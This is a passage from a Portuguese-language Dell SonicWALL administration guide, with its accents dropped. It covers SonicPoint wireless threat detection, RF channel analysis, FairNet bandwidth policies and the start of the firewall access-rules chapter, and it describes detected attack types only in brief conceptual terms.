atuais representa um alvo atraente para invasores. Se deixados sem gerenciamento, os
dispositivos de RF podem deixar sua rede sem fio (e com fio) aberta a uma variedade de
ameaas externas, de Negao de Servio (DoS) a violaes de segurana de rede.
Para ajudar a proteger suas estaes de ponto de acesso (PA) sem fio SonicPoint, o
SonicWALL examina mais de perto essas ameaas. Usando o monitoramento por RF direto, o
SonicWALL ajuda a detectar ameaas sem interromper a operao atual de sua rede com ou
sem fio.
O monitoramento por RF do SonicWALL fornece monitoramento de ameaas em tempo real e
gerenciamento do trfego de radiofrequncia do SonicPoint. Alm de seus recursos de
monitoramento de ameaas em tempo real, o monitoramento por RF SonicWALL fornece aos
administradores de rede um sistema de coleta centralizada de ameaas de RF e estatsticas
de trfego, oferecendo uma forma de gerenciar facilmente os recursos de RF diretamente do
gateway de dispositivo de segurana Dell SonicWALL.
Configurar monitoramento por RF | 529

O monitoramento por RF SonicWALL :
Em tempo real -ver informaes registradas conforme acontecerem
Transparente -no h necessidade de interromper o trfego de rede legtimo ao gerenciar
as ameaas
Abrangente -oferece deteco de muitos tipos de ameaas de RF. Para obter descries
completas dos tipos de Deteco de ameaa de RF acima, consulte Aplicativos de Campo
para Monitoramento por RF prticos na pgina 538.
Viso geral da Interface de Gerenciamento

A Interface de Gerenciamento do Monitoramento por RF SonicPoint fornece um local central
para selecionar tipos de assinaturas de RF, exibir estaes de ameaa de RF descobertas e
adicionar estaes de ameaas descobertas para uma lista de observao. Esta seo
descreve as entidades na pgina SonicPoint > Monitoramento por RF.
Figura 4 Sonic Point > Monitoramento por RF

Tabela 2 Painis de monitoramento por RF
Nome Descrio
Itens de ao Fornece as opes de aceitar, cancelar, atualizar e limpar a
pgina de Monitoramento por RF.
Painel de Resumo do Monitoramento por Exibe as unidades de Monitoramento por RF SonicPoint, total
RF de ameaas de RF e o intervalo de medio (usando
segundos como a unidade de medida).
Configuraes do quadro geral de 802.11 Exibe a quantidade total de ameaas gerais e a opo de
habilitar longa durao.
Configuraes do quadro de Configura suas configuraes do quadro de gerenciamento e
gerenciamento de 802.11 exibe o nmero de ameaas para cada configurao.
Configuraes do quadro de dados de Configura suas configuraes do quadro de dados e exibe o
802.11 nmero de ameaas para cada configurao.
Estaes de ameaas de RF descobertas
Tabela 3 Itens de Ao
Nome Descrio
Boto Aceitar Aceita as mais recentes definies de configurao.
Boto Cancelar Cancela quaisquer definies do Monitoramento por RF alteradas.
Boto Atualizar Atualiza a pgina de Monitoramento por RF do SonicPoint.
Boto Limpar Limpa todas as configuraes definidas e retorna a pgina de volta s
configuraes padro.

Tabela 4 Resumo do Monitoramento por RF
Nome Descrio
Unidades de Monitoramento por RF do Exibe o nmero total de dispositivos SonicPoint.
SonicPoint
Total de ameaas de RF Exibe o nmero total de ameaas de RF.
Intervalo de medio (segundos) Insira o intervalo de medio desejado em segundos.
Tabela 5 Configuraes do quadro geral de 802.11
Nome Descrio
Total de ameaas gerais Exibe o nmero total de ameaas gerais.
Durao longa Os dispositivos sem fio compartilham ondas sonoras dividindo o espectro RF
em 14 canais escalonados. Cada dispositivo reserva um canal por uma
(curta) durao especfica e, durante o tempo em que um dispositivo possui
um canal reservado, outros dispositivos no sabem difundir neste canal. Os
ataques de longa durao exploram este processo reservando muitos canais
RF por longas duraes, impedindo de forma eficaz que o trfego sem fio
legtimo de localizar um canal transmitido aberto.
Tabela 6 Configuraes do quadro de gerenciamento de 802.11

Clicar nas caixas de seleo Habilita/desabilita os seguintes monitores.
Nome Descrio
Total de ameaas de gerenciamento Exibe o nmero total de ameaas de gerenciamento.
Inundao de quadros de Esta variao no ataque de DoS tenta inundar pontos de acesso
gerenciamento sem fio com quadros de gerenciamento (como solicitaes de
autenticao ou associao) preenchendo a tabela de
gerenciamento com solicitaes de bogus.
Resposta da investigao nula Quando um cliente sem fio envia uma solicitao de investigao,
o hacker envia uma resposta com um SSID nulo. Esta resposta
faz com que muitos cartes e dispositivos sem fio parem de
responder.
Cancelamento de autenticao da Esta variao de DoS envia uma inundao de
transmisso cancelamento quadros de autenticao falsificada para clientes
sem fio, forando-os a cancelar a autenticao constantemente e,
subsequentemente,
autenticar novamente com um ponto de acesso.
Estao vlida com SSID invlido Neste ataque, um ponto de acesso invasor tenta transmitir uma ID
de estao confivel (ESSID). Embora o BSSID seja muitas vezes
invlido, a estao pode ainda aparecer a clientes como se fosse
um ponto de acesso confivel. O objetivo deste ataque muitas
vezes obter informaes de autenticao de um cliente confivel.
Deteco de Wellenreiter Wellenreiter e NetStumbler so dois aplicativos de software
populares usados por invasores para recuperar informaes de
redes sem fio nos arredores.
Deteco de Estao Ad-Hoc Estaes Ad-Hoc so ns que fornecem acesso a clientes sem fio
agindo como uma ponte entre o ponto de acesso real e o usurio.
Os usurios sem fio geralmente so enganados para conectar-se
a uma estao Ad-Hoc em vez de ao ponto de acesso real, j que
eles podem ter o mesmo SSID. Isso permite que a Estao Ad-
Hoc intercepte qualquer trfego sem fio que os clientes
conectados enviem ou recebam do ponto de acesso.
Tabela 7 Configuraes do quadro de dados de 802.11

Clicar nas caixas de seleo Habilita/desabilita os seguintes monitores.
Nome Descrio
Total de ameaas de dados Exibe o nmero total de ameaas de dados.
Estao no associada Uma estao sem fio tenta autenticar antes de se associar a um ponto de
acesso, a estao no associada pode criar uma DoS, enviando uma
inundao de solicitaes de autenticao para o ponto de acesso
enquanto se mantm no associada.
Deteco de NetStumbler Normalmente usada para localizar tanto acesso livre Internet quanto
redes interessantes. NetStumbler faz interface com um receptor de GPS e
software de mapeamento para automaticamente mapear locais de redes
sem fio.
Inundao do pacote EAPOL Protocolo de Autenticao extensvel sobre pacotes de LAN (EAPOL) so
usados em mecanismos de autenticao WPA e WPA2. J que tais
pacotes, como outros pacotes de solicitao de autenticao, so
recebidos abertamente por pontos de acesso sem fio, uma inundao
desses pacotes pode resultar em uma DoS para sua rede sem fio.
WEP fraca IV O mecanismo de segurana WEP usa sua chave WEP juntamente com um
nmero de 24 bits escolhido aleatoriamente como um vetor de inicializao
para criptografar dados. Os hackers de rede tm como alvo este tipo de
criptografia porque alguns dos nmeros IV aleatrios so mais fracos que
outros, tornando mais fcil descriptografar sua chave WEP.
Tabela 8 Estaes de ameaas de RF descobertas
Nome Descrio
Itens Exibe o nmero total de ameaas registradas. Use os botes de seta para
navegar pelas pginas, se aplicvel.
Estao Seleciona o tipo de estaes exibido na lista de entradas.
N Endereo MAC Classifica as entradas por Endereo MAC. Este o endereo fsico da estao de
ameaa de RF.
Tipo Classifica as entradas pelo tipo de sinal sem fio recebido da estao de ameaa.
Fornecedor Classifica as entradas por fornecedor. Este o fabricante da estao de ameaa
(determinado pelo Endereo MAC).
RSSI Classifica as entradas pela intensidade do sinal recebido conforme relatado pelo
SonicPoint. Essa entrada, juntamente com a entrada de "sensor", pode ser til na
triangulao da posio fsica real do dispositivo de ameaa de RF.
Taxa Classifica as entradas por taxa de transferncia (Mbps) da estao de ameaa.
Criptografar Classifica as entradas por criptografia de sinal sem fio na estao de ameaa,
"Nenhum" ou "Criptografado".
Ameaa de RF Classifica as entradas por ameaa de RF (ocorre na hora mais recente).

Nome Descrio
Atualizar tempo Classifica as entradas no momento em que este registro de log foi criado/
atualizado.
Sensor Classifica as entradas pela ID do SonicPoint que registrou essa ameaa. Essa
entrada, juntamente com a entrada de "Rssi", pode ser til na triangulao da
posio fsica real do dispositivo de ameaa de RF.
Comentrio Exibe uma caixa de texto para adicionar comentrios sobre a ameaa.
Configurar Configura uma lista de observao para as estaes descobertas.
Dica Voc sabia? possvel encontrar locais aproximados de dispositivos de ameaa de RF

usando estatsticas de ameaa registradas. Para obter dicas e informaes mais prticas
sobre como usar as estatsticas de ameaa de ao Gerenciamento por RF, consulte
Aplicativos de Campo para Monitoramento por RF prticos na pgina 538
Configurando o recurso de Monitoramento por RF

Esta seo inclui procedimentos para configurao do recurso de Monitoramento por RF.
Consulte Viso geral da Interface de Gerenciamento na pgina 530 para obter detalhes sobre
como usar a
Interface de Gerenciamento do Monitoramento por RF do SonicPoint Esta seo contm as
seguintes subsees :
Configurao do Monitoramento por RF em SonicPoint(s) na pgina 535
Seleo de tipos de Assinatura de RF na pgina 537
Adicionando uma estao de ameaa lista de observao na pgina 537
Aplicativos de Campo para Monitoramento por RF prticos na pgina 538
Configurao do Monitoramento por RF em SonicPoint(s)

A fim de que o Monitoramento por RF seja aplicado, voc deve habilitar a opo de
Monitoramento por RF em todos os dispositivos SonicPoint disponveis. A seo seguinte
fornece instrues para provisionar novamente todos os SonicPoints disponveis com
Monitoramento por RF habilitado.
Etapa 1 Navegue at SonicPoint > SonicPoints na interface de gerenciamento.

Etapa 2 Clique no boto Configurar correspondente ao Perfil de Provisionamento do SonicPoint
desejado.
Etapa 3 Na guia Configuraes, clique na caixa de seleo Permitir Monitoramento por RF.
Em seguida, para garantir que todos os SonicPoints esto atualizados com o recurso de
Monitoramento por RF habilitado, necessrio excluir todos os SonicPoints atuais da tabela
SonicPoint e sincronizar novamente esses SonicPoints usando o perfil recm-criado.
Etapa 4 Clique no boto Excluir tudo no canto inferior direito da tabela SonicPoints.
Etapa 5 Clique no boto Sincronizar SonicPoints na parte superior da pgina.
Seus SonicPoints sero reinicializados agora com o recurso de Monitoramento por RF
habilitado. Seja paciente, pois o processo de reinicializar pode levar vrios minutos.

Seleo de tipos de Assinatura de RF
A Interface de Gerenciamento de Monitoramento por RF permite que voc selecione quais
tipos de ameaas de RF seu SonicWALL monitora e registra.
Etapa 1 Navegue at SonicPoint > Monitoramento por RF. Os tipos de ameaas de RF so exibidos,
com uma caixa de seleo ao lado de cada um.
Etapa 2 Clique na caixa de seleo prxima a ameaa de RF para habilitar/desabilitar o gerenciamento

de tal ameaa. Por padro, todas as ameaas de RF so marcadas como gerenciadas.
Dica Para obter uma lista completa dos tipos de Ameaa de RF e suas descries, consulte
Tabela 6 na pgina 532 deste documento.
Adicionando uma estao de ameaa lista de observao

O recurso de lista de observao das estaes de ameaa ao Monitoramento por RF
descobertas permite que voc crie uma lista de observao de ameaas sua rede sem fio. A
lista de observao usada para filtrar resultados na lista de estaes de ameaa de RF
descobertas.
Para adicionar uma estao lista de observao:
Etapa 1 Na pgina SonicPoint > Monitoramento por RF, navegue at a seoEstaes de ameaas
de RF descobertas.
Etapa 2 Clique no cone correspondente estao de ameaa que deseja adicionar lista de
observao.
Etapa 3 Uma tela de confirmao ser exibida. Clique em OK para adicionar a estao lista de
observao.
Etapa 4 Se voc adicionou acidentalmente uma estao lista de observao, ou de outra forma
gostaria que uma estao fosse removida da lista, clique no cone correspondente
estao de ameaa que deseja remover.

Dica Uma vez que voc adicionou uma ou mais estaes lista de observao, voc pode filtrar
resultados para ver somente esses estaes no registro em tempo real, escolhendo
Somente as estaes no grupo da lista de observao a partir da lista suspensa Ver
Tipo.
Aplicativos de Campo para Monitoramento por RF prticos

Esta seo fornece uma viso geral de usos prticos para dados de Monitoramento por RF
coletados na deteco de fontes de ameaa Wi-Fi. Os Aplicativos de Campo para
Monitoramento por RF prticos so fornecidos como sugestes gerais de senso comum para
usar dados do Monitoramento por RF.
Antes de ler esta seo na pgina 538
Uso da ID do Sensor para determinar o Local da Ameaa de RF na pgina 539
Uso do RSSI para determinar proximidade da Ameaa de RF na pgina 540
Antes de ler esta seo

Ao usar os dados de RF para localizar as ameaas, tenha em mente que os sinais sem fio so
afetados por vrios fatores. Antes de continuar, tome nota das seguintes opes:
Intensidade do sinal no sempre um bom indicador de distncia - obstruo como
paredes, interferncia sem fio , sada de energia do dispositivo e at mesmo umidade e
temperatura do ambiente podem afetar a intensidade do sinal de um dispositivo sem fio.
Um Endereo MAC no sempre permanente - ao passo que um Endereo MAC
geralmente um bom indicador de tipo de dispositivo e fabricante, esse endereo
suscetvel a alteraes e pode ser falsificado. Da mesma forma, os criadores de ameaas
de RF podem ter mais de um dispositivo de hardware sua disposio.

Uso da ID do Sensor para determinar o Local da Ameaa de RF
Na lista de Estaes de Ameaa de RF descobertas, o campo de Sensor indica qual SonicPoint
est detectando a ameaa especfica. Usar uma ID do Sensor e Endereo MAC do SonicPoint
permite que voc facilmente determine o local do SonicPoint que est detectando a ameaa.
Timesaver Para essa seo em particular (e como um bom hbito em geral), talvez seja til manter um
registro dos locais e dos Endereos MAC de seus dispositivos SonicPoint.
Etapa 1 Navegue para a pgina SonicPoint > Monitoramento por RF na Interface de Gerenciamento.
Etapa 2 Na tabela Estaes de Ameaa de RF descobertas, localize o Sensor para o SonicPoint que
est detectando o ameaa de RF alvo e registre o nmero.
Etapa 3 Navegue at SonicPoint > SonicPoints.
Etapa 4 Na tabela SonicPoints, localize o SonicPoint que corresponde ao nmero do Sensor que voc
registrou na Etapa 2.
Etapa 5 Registre o Endereo MAC para este SonicPoint e us-o para encontrar o local fsico do
SonicPoint.
A ameaa de RF provavelmente est no local que atendido por este SonicPoint.
SonicWALL NSA E7500

with RF Management enabled
SonicPoint
SonicPoint
sensor: 0425A6
SonicPoint
SonicPoint
sensor: 123502
Sensor - Identifies which

individual SonicPoint(s)
are detecting the RF threat.
RF Threat

Uso do RSSI para determinar proximidade da Ameaa de RF
Esta seo se baseia no que foi aprendido no Uso da ID do Sensor para determinar o Local da
Ameaa de RF na pgina 539. Na lista de Estaes de Ameaa de RF descobertas, o campo
Rssi indica a intensidade do sinal em que um determinado SonicPoint est detectando uma
ameaa de RF.
O campo Rssi permite determinar facilmente a proximidade de uma ameaa de RF ao
SonicPoint que est detectando essa ameaa. Um nmero maior de Rssi geralmente significa
que a ameaa est mais perto do SonicPoint.
Dica importante lembrar que paredes servem como barreiras para os sinais sem fio. Enquanto
que um sinal Rssi muito fraco pode significar que a ameaa de RF fica muito longe do
SonicPoint, tambm pode indicar uma ameaa localizada perto, mas fora da sala ou prdio.
Etapa 1 Navegue para a pgina SonicPoint > Monitoramento por RF na Interface de Gerenciamento.
Etapa 2 Na tabela Estaes de Ameaa de RF Descobertas, localize o Sensor e Rssi para o
SonicPoint que est detectando a ameaa de RF alvo e registre esses nmeros.
Etapa 3 V para a pgina SonicPoint > SonicPoints.
Etapa 4 Na tabela SonicPoints, localize o SonicPoint que corresponde ao nmero do Sensor que voc
registrou na Etapa 2.
Etapa 5 Registre o Endereo MAC para este SonicPoint e us-o para encontrar o local fsico do
SonicPoint.
Um Rssi alto geralmente indica uma ameaa de RF que est mais perto do SonicPoint. Um
Rssi baixo pode indicar obstruo ou uma ameaa de RF mais distante.

Captulo 38
Usando a Anlise RF
SonicPoint > Anlise RF

Esta seo descreve como usar o recurso de Anlise de RF do SonicWALL SonicOS Enhanced
para utilizar melhor a largura de banda sem fio com os dispositivos SonicPoint e SonicPoint-
N. Esta seo contm as seguintes subsees:
Viso geral de Anlise RF na pgina 541
Usando a Anlise RF em SonicPoint(s) na pgina 542
Viso geral de Anlise RF

A Anlise RF (RFA) um recurso que ajuda o administrador da rede sem fio a entender como
os canais sem fio so utilizados pelos pontos de acesso sem fio SonicPoints gerenciados, os
dispositivos SonicPoint-Ns e todos os outros pontos de acesso vizinhos. Esta seo contm
as subsees seguintes:
Por que Anlise RF? na pgina 541
O ambiente RF na pgina 542
Nota A RFA do SonicWALL pode analisar os pontos de acesso de outros fabricantes e incluir
essas estatsticas nos dados RFA desde que pelo menos um ponto de acesso SonicPoint
esteja presente e seja gerenciado atravs do firewall.
Por que Anlise RF?

A implantao e manuteno da infraestrutura sem fio pode ser uma tarefa assustadora para
o administrador de rede. Problemas sem fio, como baixo desempenho e conectividade ruim
so questes que os administradores de rede sem fio geralmente enfrentam, mas,
ironicamente, podem ser resolvidos geralmente com simples anlise e ajuste das
configuraes de rdio corretas.
Usando a Anlise RF | 541

A RFA uma ferramenta que traz conscientizao para esses problemas potenciais de rede
sem fio. As duas principais questes que a RFA lida so canais sobrecarregados e a
interferncia PA em canais adjacentes. A RFA calcula uma Pontuao de RF para cada
SonicPoint operacional e exibe os dados de uma maneira que permite que o administrador
identifique pontos de acesso operando no ambiente de RF ruim.
O ambiente RF
O IEEE 802.11 mantm que os dispositivos usam bandas ISM 2,4 GHz e 5 GHz, com a maioria
dos atuais implantados em dispositivos sem fio usando a banda de 2,4 GHz. Por cada canal
ocupar um amplo espectro de 20MHz, apenas trs canais de 11 disponveis no esto
sobrepostos. Nos Estados Unidos, canais 1, 6 e 11 so no-sobrepostos. Na maioria dos
casos, esses so os trs canais usados durante a implantao de um grande nmero de
SonicPoints.
Figura 5 Seleo de canal manual do SonicPoint

p _
Channel 1 Channel 6 Channel 11 Channel 1
Channel 11 Channel 1 Channel 6
Toda a banda de 2,4 GHz dividida em trs canais separados, 1, 6 e 11. Para alcanar esse
cenrio ideal, dois fatores so necessrios: ajuste de energia e alocao de canais. Na maioria
dos cenrios, melhor atribuir os dispositivos SonicPoint vizinhos a canais diferentes. A
potncia de transmisso do SonicPoint deve tambm ser observada cuidadosamente, uma vez
que precisa ser suficientemente forte para os prximos os clientes se conectarem mas no to
potente para causar interferncia com outros SonicPoints que operam no mesmo canal.
Usando a Anlise RF em SonicPoint(s)

A RFA usa pontuaes, grficos e nmeros para ajudar os usurios a detectarem e
identificarem problemas potenciais ou existentes na rede sem fio.
Embora o melhor cenrio seja ter o menor nmero de pontos de acesso trabalhando no mesmo
canal a qualquer momento, no mundo real difcil manter isso, especialmente ao implantar
uma grande quantidade de pontos de acesso. Alm disso, uma vez que a banda ISM gratuita
para o pblico, pode haver outros dispositivos operando fora controle imediato do
administrador de rede.

Informaes e grficos de utilizao do canal na pgina 543
Compreendendo a Pontuao de RF na pgina 543
Visualizando canais sobrecarregados na pgina 544
Canais altamente interferidos RFA na pgina 544
Informaes e grficos de utilizao do canal

Na pesquisa de uma maneira de mostrar como o canal utilizado para todos os SonicPoints
conectados, chegamos em uma apresentao de um grfico de utilizao do canal.
Figura 6 Uso de canal RFA
H duas barras coloridas para cada canal. O nmero na parte superior de cada barra de cor
indica o nmero de SonicPoints que detectam o problema especfico no canal. Os SonicPoints
executam uma varredura de IDS em canais disponveis aps a inicializao e a RFA analisa
esses resultados para decidir sobre problemas para cada canal da varredura.
Por exemplo: se houver 10 SonicPoints conectados e 6 desses decidirem que o canal 11 est
sobrecarregado, o nmero na parte superior da barra de cores roxo ser 6; se 8 SonicPoints
decidirem que o canal 6 altamente interferido, o nmero na parte superior da barra de cores
ciano ser 8. Zero ser mostrado para canais sem problemas.
Nota Canais 12, 13 e 14 so exibidos, mas em alguns pases esses canais no so usados.
Esses canais ainda so monitorados, no entanto, porque possvel que um cracker sem fio
configure um jammer sem fio no canal 12, 13 ou 14 e inicie um ataque de negao de
servio para reduzir canais.
Compreendendo a Pontuao de RF
A pontuao de RF um nmero calculado em uma escala de 1 a 10 usada para representar
a condio geral de um canal. Quanto maior a pontuao, melhor o ambiente RF. A
pontuao baixa indica que necessria ateno do administrador.

O driver sem fio do SonicWALL reporta fora de sinal em RSSI, e esse nmero usado na
equao abaixo para obter uma pontuao bruta em uma escala de 1 a 100.
Frmula de pontuao de RFF preliminar:
rfaScore100 = 100-((rssiTotal-50)*7/10)) simplified: rfaScore100 = -0.7*rssiTotal + 135;
Uma pontuao final baseada o rfaScore100:
Se a pontuao RFA for maior que 96, ele relatado como 10.
Se a pontuao RFA for menor que 15, ele relatado como 1.
Todas as outras pontuaes so divididas por 10 para se enquadrem em escalas de 1 a 10.
Na interface do SonicOS, a Pontuao de RF exibida para o canal que est sendo usado pelo
SonicPoints.
Nota Esse recurso depende do conhecimento de qual canal o SonicPoint est operando. Se o
nmero de canal for desconhecido, a Pontuao de RF vai no estar disponvel.
Visualizando canais sobrecarregados

A RFA dar um aviso ao detectar mais de quatro PAS ativas no mesmo canal. Como mostrado
abaixo, no importa o quo forte sua intensidade do sinal seja, a RFA ir marcar o canal como
sobrecarregado.
Figura 7 Canais de sobrecarga de RFA
Informaes sobre cada descoberta de PA inclui: SSID, MAC, intensidade do sinal e canal.
Dois valores so mostrados para intensidade do sinal: valor de dBm e porcentagem.
Canais altamente interferidos RFA

No s PAs trabalhando no mesmo canal criar interferncia. PAs operando em canais
adjacentes (nmero de canal menor que 5 de distncia entre si) tambm iro interferir uns com
os outros.
A RFA dar um aviso ao detectar que, em torno de um determinado SonicPoint, h mais de
cinco PAs ativos nos canais que so menos de cinco de distncia entre si. No importa o quo
forte sua intensidade do sinal seja, o RFA ir marcar o canal como de alta interferncia.

Figura 8 Canais altamente interferidos RFA
Informaes sobre cada descoberta de PA inclui: SSID, MAC, intensidade do sinal e canal.
Dois valores so mostrados para intensidade do sinal: valor de dBm e porcentagem.

Captulo 39
SonicPoint FairNet
SonicPoint > FairNet

Esta seo detalha o recurso do Dell SonicWALL FairNet e fornece exemplos de configurao
para facilitar a implantao. Esta seo contm as seguintes subsees:
Compreendendo o SonicPoint FairNet na pgina 547
Configurando o SonicPoint FairNet na pgina 551
Compreendendo o SonicPoint FairNet

Esta seo uma viso geral do recurso SonicPoint FairNet e contm as subsees a seguir:
O que o SonicPoint FairNet? na pgina 547
Consideraes de implantao na pgina 548
Plataformas suportadas na pgina 548
Recursos no SonicPoint FairNet na pgina 548
Viso geral da Interface de gerenciamento na pgina 549
O que o SonicPoint FairNet?

O recurso SonicPoint FairNet fornece um mtodo fcil de usar para os administradores de rede
controlarem a largura de banda de clientes sem fio associados e verifica se ele distribudo
uniformemente entre eles. Os administradores podem configurar os limites de largura de
banda do SonicPoint FairNet para todos os clientes sem fio, intervalos de endereo IP
especficos ou clientes individuais para fornecer eficincia justa na rede.
A ilustrao abaixo um exemplo de uma topologia SonicPoint FairNet tpica:
SonicPoint FairNet | 547

Figura 9 Topologia FairNet tpica
Dell SonicWALL SuperMassive
10GE 1GE 1GE

X18 X16 X14 X12 X10 X8 X6 X4 X2 X0
SDHC
M0
ALARM
BYPASS
STATUS
TEST
SonicPoint SonicWALL SuperMassive 9600 CONSOLE

PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
lan
wlan
act link
act
link
lan
cons
ole
Wireless Clients PC
WLAN WAN
Consideraes de implantao
Ao implantar o recurso de SonicPoint FairNet, considere o seguinte:
Voc deve ter um PC ou laptop com um controlador de interface de rede sem fio
IEEE802.11b/g/n.
Plataformas suportadas
O recurso SonicPoint FairNet atualmente suportado nos seguintes modelos de dispositivo:
SuperMassive 9200
SuperMassive 9400
SuperMassive 9600
NSA 2600
NSA 3600
NSA 4600
NSA 5600
NSA 6600
Recursos no SonicPoint FairNet

Esta seo detalha os recursos no SonicPoint FairNet.
Funo de coordenao distribuda

A Funo de coordenao distribuda (DCF) fornece integridade de tempo para cada cliente
acessar uma mdia com oportunidades iguais. No entanto, ele no pode garantir a integridade
de trfego de dados por estao entre todos os clientes sem fio. O recurso SonicPoint FairNet
implementado sobre o DCF 802.11 existente para garantir a largura de banda justa entre
clientes sem fio, independentemente do nmero e da direo de fluxos.

Controle de trfego
O recurso de controle de trfego decide se os pacotes esto na fila ou descartados (por
exemplo, se a fila atingiu algum limite de comprimento ou se o trfego excede algum limite de
taxa). Ele tambm pode decidir a ordem na qual os pacotes so enviados (por exemplo, dar
prioridade a certas propriedades) e pode retardar o envio de pacotes (por exemplo, para limitar
a taxa de trfego de sada). Uma vez que o controle de trfego lanou um pacote de envio, o
driver de dispositivo coleta e emite-o na rede.
Viso geral da Interface de gerenciamento

Esta seo descreve as funes da interface de gerenciamento do SonicPoint FairNet.
Figura 10 SonicPoint > FairNet
Nome Descrio
Boto Aceitar Aplica as definies de configurao mais recentes.
Boto Cancelar Cancela quaisquer alteraes nas definies de configurao.
Caixa de seleo Habilitar Ativa o recurso SonicPoint FairNet.
FairNet
Caixa de seleo Polticas Marca ou desmarca todas as polticas na tabela Polticas de FairNet. Tambm
FairNet possvel selecionar polticas individuais na lista de polticas.
Coluna de direo Exibe a direo de cada poltica. Essas direes incluem:
Uplink
Downlink
Ambas
Coluna de IP inicial Exibe o ponto inicial para o intervalo de endereo IP.
Coluna de IP final Exibe o ponto final para o intervalo de endereo IP.
Coluna de Taxa mnima A largura de banda mnima a qual os clientes esto garantidos. A taxa mnima
(kbps) de 1 kbps.
Coluna de Taxa mxima A largura de banda mxima a qual os clientes esto garantidos. A taxa
(kbps) mxima 54.000 kbps.
Coluna de Interface Exibe a interface a que se aplica a poltica SonicPoint FairNet.
Esta a interface no firewall de gerenciamento a qual o dispositivo SonicPoint
est conectado.
Caixa de seleo Habilitar Ativa a poltica SonicPoint FairNet selecionada.
Boto Configurar Edita polticas SonicPoint FairNet existentes.

Nome Descrio
Adicionar... Boto Adiciona uma poltica SonicPoint FairNet para um endereo IP ou intervalo de
endereos.
Boto Excluir Exclui a poltica SonicPoint FairNet selecionada.
Figura 11 Polticas FairNet
Nome Descrio
Caixa de seleo Ativa a poltica FairNet. Esta opo est ativada por padro.
Ativar poltica
Menu suspenso de Selecione se os limites de largura de banda para a poltica se aplicam aos clientes
direo que esto fazendo upload do contedo, download de contedo, ou ambas direes.
Ambas as direes
Downlink (AP para cliente)
Uplink (Cliente para AP)
Campo de texto IP Digite o endereo IP inicial a que a poltica FairNet aplica-se. O endereo IP deve
inicial estar em uma sub-rede configurada para uma interface WLAN.
Campo de texto IP Digite o endereo IP final a que a poltica FairNet aplica-se. O endereo IP deve
final estar em uma sub-rede configurada para uma interface WLAN.
Campo de Texto do Insira a largura de banda mnima a qual os clientes esto garantidos.
Taxa mnima (kbps)
Campo de Texto do Insira a largura de banda mxima a qual os clientes esto garantidos.
Taxa mxima (kbps)
Menu suspenso de Seleciona a interface que a poltica SonicPoint FairNet aplicada.
Interface Nota: Esta a interface no firewall de gerenciamento a qual o dispositivo SonicPoint
est conectado.
Boto OK Adiciona a poltica lista de Polticas FairNet.
Boto Cancelar Cancela as informaes inseridas na janela pop-up "Poltica FairNet".

Configurando o SonicPoint FairNet
Esta seo contm um exemplo de configurao do FairNet. Para configurar o FairNet para
fornecer mais largura de banda em ambas direes, execute as seguintes etapas:
Etapa 1 Navegue at a pgina SonicPoint > FairNet.
Etapa 2 Clique no boto Adicionar....
Figura 12 Adicionar poltica FairNet
Etapa 3 Certifique-se de que a caixa de seleo Ativar poltica est selecionada. Esta caixa de
seleo est habilitada por padro.
Etapa 4 Clique no menu suspenso Direo e, em seguida, selecione Ambas direes. Isso aplica a
poltica aos clientes que fazem upload de contedo e download de contedo.
Etapa 5 Clique na caixa de texto IP inicial e, em seguida, digite o endereo IP inicial (172.16.29.100)
para a poltica FairNet.
Etapa 6 Clique na caixa de texto IP final e, em seguida, digite o endereo IP final (172.16.29.110) para
a poltica FairNet.

Dica O intervalo do endereo IP deve estar em uma sub-rede configurada para uma interface
WLAN.
Etapa 7 Clique na caixa de texto Taxa mnima (kbps) e insira a largura de banda mnima (1000 Kbps)
Etapa 8 Clique na caixa de texto Taxa mxima (kbps) e insira a largura de banda mxima (2000 Kbps)
Etapa 9 Clique no menu suspenso Interface e selecione a interface (X2) que o dispositivo SonicPoint
est conectado.
Etapa 10 Clique no boto OK.
Etapa 11 Clique na caixa de seleo Ativar FairNet.

Etapa 12 Clique no boto Aceitar.
Etapa 13 A poltica FairNet do SonicWALL est agora configurada.

Parte 8
Firewall
| 553
Captulo 40
Configurar regras de acesso do firewall
Firewall > Regras de acesso

Esta seo fornece uma viso geral das regras de acesso padro e personalizadas do
dispositivo de segurana de rede Dell SonicWALL. As regras de acesso so ferramentas de
gerenciamento de rede que permitem que voc defina polticas de acesso de entrada e sada,
configure a autenticao do usurio e habilite o gerenciamento remoto do seu firewall. Esta
seo fornece exemplos de configurao para personalizar suas regras de acesso, de forma
a atender s suas necessidades de negcios.
As regras de acesso so ferramentas de gerenciamento de rede que permitem que voc defina
polticas de acesso de ingresso e egresso, configure a autenticao do usurio e habilite o
gerenciamento remoto do dispositivo de segurana Dell SonicWALL.
Configurar regras de acesso do firewall | 555

A pgina Firewall > Regras de acesso do SonicOS disponibiliza uma interface classificvel
de gerenciamento de regras de acesso. As sees seguintes fornecem vises gerais de alto
nvel sobre como configurar regras de acesso por zonas e configurar gerenciamento de largura
de banda usando regras de acesso.
Viso geral de regras de acesso padro de inspeo de pacotes com monitorao de
estado na pgina 556
Viso geral do uso do gerenciamento de largura de banda com as regras de acesso na
pgina 557
Configurando regras de acesso para o IPv6 na pgina 558
Lista de tarefas de configurao na pgina 558
Viso geral de regras de acesso padro de inspeo de pacotes

com monitorao de estado
Por padro, a inspeo de pacotes com monitorao de estado do dispositivo de segurana de
rede Dell SonicWALL permite total comunicao a partir da LAN para a Internet e bloqueia todo
o trfego para a LAN a partir da Internet. Os comportamentos a seguir so definidos pela regra
de acesso "padro" de inspeo de pacotes com monitorao de estado habilitada no
dispositivo de segurana de rede Dell SonicWALL:
Permitir todas as sesses com origem na LAN, WLAN at a WAN ou DMZ (exceto quando
o endereo IP da WAN de destino a interface WAN do prprio firewall).
Permitir todas as sesses com origem na DMZ at a WAN.
Negar todas as sesses com origem na WAN at a DMZ.
Negar todas as sesses com origem na WAN e DMZ at a LAN ou WLAN.
possvel definir mais regras de acesso rede para aumentar ou substituir regras de acesso
padro. Por exemplo, possvel criar regras de acesso que permitam o acesso da zona de
LAN ao endereo IP primrio de WAN ou bloquear determinados tipos de trfego, como IRC
da LAN para a WAN, ou permitir determinados tipos de trfego, como a sincronizao do banco
de dados do Lotus Notes, de hosts especficos na Internet para hosts especficos na LAN ou
restringir o uso de determinados protocolos, como Telnet, a usurios autorizados na LAN.
Regras de acesso personalizadas avaliam os endereos IP de origem, os endereos IP de
destino e os tipos de protocolo IP do trfego de rede e comparam a informao com as regras
de acesso criadas no dispositivo de segurana Dell SonicWALL. As regras de acesso rede
tm prioridade e podem substituir a inspeo de pacotes estvel do dispositivo de segurana
